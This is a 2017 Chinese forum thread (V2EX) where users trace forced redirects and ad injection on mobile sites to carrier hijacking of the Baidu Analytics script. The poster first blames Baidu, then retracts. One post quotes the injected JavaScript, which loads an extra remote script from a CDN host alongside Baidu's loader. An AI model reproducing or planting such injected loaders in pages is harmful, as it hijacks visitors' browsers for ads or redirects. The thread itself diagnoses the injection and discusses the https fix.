V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
ff66
V2EX  ›  宽带症候群

投诉电信劫持,最后发现是百度统计作恶..

  •  1
     
  •   ff66 · 2017-08-28 08:33:42 +08:00 · 9246 次点击
    这是一个创建于 2679 天前的主题,其中的信息可能已经有所发展或是发生改变。
    图片如下
    imgur,com/Ee2Qo7U
    imgur,com/5Whbwvg
    imgur,com/0JmUX3H

    新账户发不出图片,用,换成.

    这次百度劫持 2 级域名为 m 的微网站,只要有百度统计..晚上根据地区来强制劫持..
    猖狂到 10 次有 5 次强制跳转...
    41 条回复    2017-08-28 22:47:44 +08:00
    xfspace
        1
    xfspace  
       2017-08-28 08:35:55 +08:00 via Android
    百度统计是替死鬼
    littlepanzh
        2
    littlepanzh  
       2017-08-28 08:40:28 +08:00 via iPhone
    百度能挟持你域名?动动脑子好麼……
    ff66
        3
    ff66  
    OP
       2017-08-28 08:42:04 +08:00
    @xfspace 投诉过电信 2 次,第 2 次杭州那边说已经加入白名单..

    经测试 a 站,观察者网,环球网,驱动之家.
    其中后面 3 个有百度统计,A 站没有..

    宽带 WIFI 下(ip:温州):
    3 个有百度统计的,有插入图标或者跳转的行为,A 站没有..

    电信 4G(ip:杭州)
    4 个网站皆正常!

    移动 4G
    没有外部劫持,倒是移动自己插入个移动的图标..

    第 2 张图里 var _ixi_="wenz2" 就是指温州..
    xvx
        4
    xvx  
       2017-08-28 08:45:47 +08:00 via Android
    难道百度统计有恶意代码随机自动跳转?
    ff66
        5
    ff66  
    OP
       2017-08-28 08:46:03 +08:00
    @littlepanzh
    有些网站有百度统计,看代码..
    只要 html 里有百度的 hm 统计代码,就可以劫持跳转!

    var _ixi_ = "wenz2"; (function() {
    var l = document.createElement("script");
    l.src = "http://hm.baidu.com//h.js?8ab18ec6e3ee89210917ef2c8572b30e";
    document.body.appendChild(l);
    })(); (function() {
    if ("undefined" == typeof _yd_) { (function() {
    var l = document.createElement("script");
    l.src = "http://7xj2du.com1.z0.glb.clouddn.com/ali8272.min.js" + "?_y=" + Math.round(new Date().getTime() / 1000 / 1000);
    document.body.appendChild(l);
    })();
    }
    })();
    swulling
        6
    swulling  
       2017-08-28 08:46:12 +08:00 via iPhone
    百度不是运营商,怎么劫持?
    swulling
        7
    swulling  
       2017-08-28 08:47:14 +08:00 via iPhone
    @ff66 很可能是 hm.baidu.com 被劫持了
    ff66
        8
    ff66  
    OP
       2017-08-28 08:53:00 +08:00
    @swulling
    hm.baidu.com 就是 1 个在前端底部,远程加载 js 脚本...

    如 m,guancha,cn 底部就有 hm 统计代码
    所以百度那边很容易获得你当前需要统计(m,guancha,cn)的域名.

    你说的也是有可能,经过工信部投诉,但是电信加 2 次白名单.还是无效..
    应该是百度作恶...
    xiashali
        9
    xiashali  
       2017-08-28 08:53:23 +08:00
    宁波电信工号 60 号的人上个月说已经报安保部门处理了
    反正这个月还是有劫持
    不知道你有没有 http 跳转到一个赌博游戏的广告
    yidinghe
        10
    yidinghe  
       2017-08-28 08:55:00 +08:00 via Android
    引用的百度脚本是 https 的么,如果不是,那么还有其他可能
    xiashali
        11
    xiashali  
       2017-08-28 08:55:05 +08:00   ❤️ 2
    的 @ff66 #8 白名单是省公司自行投放广告名单,显然这个不是,所以加了也没用
    yidinghe
        12
    yidinghe  
       2017-08-28 08:56:32 +08:00 via Android   ❤️ 1
    记得去年(还是前年) github 遭受过一次攻击,手法就是注入百度的脚本,令浏览器向 github 发送大量请求。
    LanFomalhaut
        13
    LanFomalhaut  
       2017-08-28 09:03:36 +08:00   ❤️ 2
    就是运营商劫持的..竟然信运营商说给你加白了 再出现就不是运营商的事情的这种鬼话..

    你看你 1 图 h.js 被加载了 2 次 这个套路浙江电信早就用过了 劫持 JS 文件 然后代码里面是重新引入(原 JS_URL+“?”) 外多一个广告 JS
    ff66
        14
    ff66  
    OP
       2017-08-28 09:10:14 +08:00
    @yidinghe
    var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
    document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3F8ab18ec6e3ee89210917ef2c8572b30e' type='text/javascript'%3E%3C/script%3E"));

    不一定,但是大部分应该是 http...
    flowfire
        15
    flowfire  
       2017-08-28 09:13:37 +08:00 via Android
    我已经好久没有用过非 https 的网站了…………
    whisperer
        16
    whisperer  
       2017-08-28 09:16:40 +08:00   ❤️ 1
    是百度统计被劫持了吧,我遇到过,把百度统计的 hm.js 放到自己服务器上就可以了
    ff66
        17
    ff66  
    OP
       2017-08-28 09:25:20 +08:00
    @whisperer
    刚试了下,还这 TMD 是...
    https:
    imgur,com/qAqXS18

    http:
    imgur,com/X08gP8G


    @LanFomalhaut @xiashali 感谢你们提醒,我继续投诉电信...
    Lentin
        18
    Lentin  
       2017-08-28 09:39:24 +08:00   ❤️ 1
    这又不是贴吧为啥要换网址符号 这又不是贴吧为啥要换网址符号 这又不是贴吧为啥要换网址符号

    ff66
        19
    ff66  
    OP
       2017-08-28 09:44:21 +08:00
    @Lentin ve2x 注册不到一个月,无法发送域名相关的...所以替换成,
    Lentin
        20
    Lentin  
       2017-08-28 09:46:30 +08:00
    @ff66 #19 噗……没注意到还有这个情况……
    anyforever
        21
    anyforever  
       2017-08-28 09:53:11 +08:00
    @swulling 我也感觉是百度统计的 js 代码文件被劫持了。。
    lengxx
        22
    lengxx  
       2017-08-28 09:57:47 +08:00
    百度真惨,这锅表示不背
    wql
        23
    wql  
       2017-08-28 09:58:35 +08:00 via Android
    百度名声再不好,这也明显是被当成替死鬼了……
    ff66
        24
    ff66  
    OP
       2017-08-28 10:00:00 +08:00
    @lengxx @wql
    没办法,作恶太多,黑锅自然往头上背..

    这里向百度道歉...
    LanFomalhaut
        25
    LanFomalhaut  
       2017-08-28 10:14:27 +08:00
    @ff66 实话说 放弃吧 浙江电信的劫持早在 14 还是 15 年时候 我肛了整整一年 省公司 集团总公司 省通管局 工信部 全部试过了 最后都是临时白名单几天 运营商给有关部门的回复是:“经深度检查 一切设备正常 不存在劫持情况” 有关部门又不会立案调查什么的 基本得到回复后就结束了 投诉者打电话问后续 也就把运营商给的回复给说一下罢了
    ff66
        26
    ff66  
    OP
       2017-08-28 10:19:14 +08:00
    @LanFomalhaut
    起码也得反抗下,恶心下电信...
    15 年我投诉过.apk 劫持(下载任何后缀为.apk,来个应用宝),那之后到现在没复发(可能电信放弃劫持 apk,转而跳转,弹送小广告)...

    感谢分享你的经历...
    Biny
        27
    Biny  
       2017-08-28 10:19:55 +08:00
    百度其實都機可憐個,傳說中的接盤俠。
    elviscai
        28
    elviscai  
       2017-08-28 10:55:48 +08:00
    还一个思路——你是不是换过 DNS ?

    之前一哥们单位也是被劫持,结果发现只有 DNS 设置 114 时候有广告😂
    ff66
        29
    ff66  
    OP
       2017-08-28 10:59:04 +08:00
    @elviscai
    223.5.5.5 不过第一时间就想过 dns 的问题了...
    qwvy2g
        30
    qwvy2g  
       2017-08-28 11:03:03 +08:00 via Android
    用手机打开有些不同网站的居然是一样的域名,查了一下是百度快照的域名。但是这些网站明明好好的,又没有故障,搜索时也没有打开显示网页快照的选项。比如在手机上用百度搜索小米路由器论坛,第二个显示的域名 transcoder.baiducontent 点 com,电信和教育网都试过还是这样。手机版网页版会出现这种情况,PC 端是正常的。
    firedfox
        31
    firedfox  
       2017-08-28 11:30:25 +08:00
    是因为你自己的网络被运营商劫持或者被 dns 劫持了。
    如果自己有网站用了百度统计,把它 js 代码的协议改成 https 就能避免被劫持,现在百度统计默认提供的代码已经都是 https 的了
    ELLIA
        32
    ELLIA  
       2017-08-28 13:26:10 +08:00
    @Biny 百度这锅背的……之前的魏则西事件,都去骂百度了,没人管为啥这个医院都上了央视采访……
    xfspace
        33
    xfspace  
       2017-08-28 13:33:45 +08:00
    barbery
        34
    barbery  
       2017-08-28 14:02:00 +08:00
    喷错人了,少年。。。换 https 加载百度统计把,营运商挟持了百度统计的静态资源,插入了恶意代码
    srrshweee
        35
    srrshweee  
       2017-08-28 14:19:50 +08:00
    @barbery 怎么换成 https 的百度统计?
    barbery
        36
    barbery  
       2017-08-28 14:34:00 +08:00
    @srrshweee 这个很简单啊,把部署代码里面的加载 js 的链接换成 https 的就好了啊。。。
    qwvy2g
        37
    qwvy2g  
       2017-08-28 15:27:33 +08:00 via Android
    @xfspace 关键这转码和原网站效果是一样的,也没有百度转码特有的底部返回原网站链接和广告。
    lk1ngaa7
        38
    lk1ngaa7  
       2017-08-28 15:51:39 +08:00
    百度:这锅我不背
    gogohigh
        39
    gogohigh  
       2017-08-28 16:21:48 +08:00
    百度:呜呜呜呜呜
    Biny
        40
    Biny  
       2017-08-28 17:52:39 +08:00
    @ELLIA 這個道理,媒體懂,行業懂,百度的員工懂,政策層也懂。一邊是可想而知的輿論圍攻,另一面是無法得罪的軍方和政府機構。把百度作為整個事件唯一的責任人,顯然是不公平的。
    fengleidongxi
        41
    fengleidongxi  
       2017-08-28 22:47:44 +08:00
    我感觉这个不太可能,因为百度不是电信运营商
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2649 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 11:48 · PVG 19:48 · LAX 03:48 · JFK 06:48
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.